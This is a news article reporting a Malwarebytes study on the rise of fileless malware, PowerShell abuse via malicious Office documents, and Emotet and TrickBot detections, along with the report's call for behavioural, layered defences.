alswart - stock.adobe.com
These attacks and compromises are growing in sophistication and frequency, and are proving to be particularly successful against businesses because the majority of past security solutions were designed to detect file-based malware that resided on the disk, not in memory, the report warned.
This growing gap in protection has led to a tremendous increase in attacks, compromises, and resulting data theft from fileless attacks, the report said, citing a Ponemon Institute report that said fileless malware attacks account for about 35% of all attacks so far in 2018, and are almost 10 times more likely to succeed than file-based attacks.
Malwarebytes researchers noted that new malware being developed and deployed in the wild has features and techniques enabling attackers to go further than before in terms of infection, detection evasion and persistence.
This “under-the-radar malware” is a cause for concern for businesses today and in the future, the report said, avoiding detection and maintaining persistence by “borrowing the propagation and anti-forensic techniques seen in the complex nation state attacks of the past”.
PowerShell is a trusted administrative scripting tool on Windows systems that can be abused to commit malicious acts, which attackers have been doing for the past few years.
According to the researchers, PowerShell is most often used in conjunction with a macro script in a malicious Microsoft Office document.
Using PowerShell to download and install additional malware gives attackers “extraordinary capabilities”, the report said, such as launching fileless malware attacks directly into memory to evade detection.
Because of the success rate of this type of attack, the report warned that malware of the future is likely be fileless.
The banking trojan/downloader/botnet known as Emotet, along with its commonly seen accomplice TrickBot, mainly use email distribution with malicious Office documents using PowerShell to download and launch the malware.
The research data shows that Emotet saw a massive increase in business detections between the last three quarters of 2017 and the first three of 2018, with a nearly 88% increase in this threat’s distribution against Malwarebytes business customers.
Read more about fileless malware
- Fileless malware a growing trend, warns McAfee.
- How to tackle fileless malware attacks.
- Social engineering at the heart of fileless malware attacks.
- Aim to detect and contain fileless malware attacks quickly.
- Multi-layered security key to fileless malware defence.
- Patch, scan and lock down to counter fileless malware.
The data shows that the UK has seen more Emotet infections than any other European country in 2018.
Malwarebytes telemetry indicates the detection and removal of Trickbot malware almost half a million times in the first nine months of 2018, showing that businesses are facing highly dynamic attacks that are modified to avoid detection.
This class of malware requires a new approach to stopping the threats before they create more damage to businesses, the report said, pointing out that the security industry is typically slow to respond to the latest threats, and is rarely able to stop new threats with old technology.
“The security providers of today need to be able to pivot based on the newest threat vector and quickly develop the tools to combat it, because the future is not full of easy-to-detect junkware, but difficult-to-detect, difficult-to-remediate, sophisticated and dangerous malware,” the report said.
However, the researchers said their findings are not all negative, with indications that security is being improved through some technological developments and innovations such as behavioural detection, delivery blocking capabilities, and self-defence capabilities.
These features are effective at combating today’s threats and will soon be needed to build the basis for future developments, such as artificial intelligence being used to develop, distribute or control malware, and the continued development of fileless and “invisible” malware, the researchers said.
According to the report, organisations need to deploy security tools that can modify and refine detection and remediation capabilities.
“We need every aspect of the computing experience to be monitored and secured, including incoming and outgoing traffic to which processes can run and even which files can be downloaded,” the report said.
“In the future, we need more than a shield – we need a smooth orb of protection with no cracks, and a dynamic and reflective skin giving the user a full view of what is out there, what is trying to get in, and what is hiding under the radar.”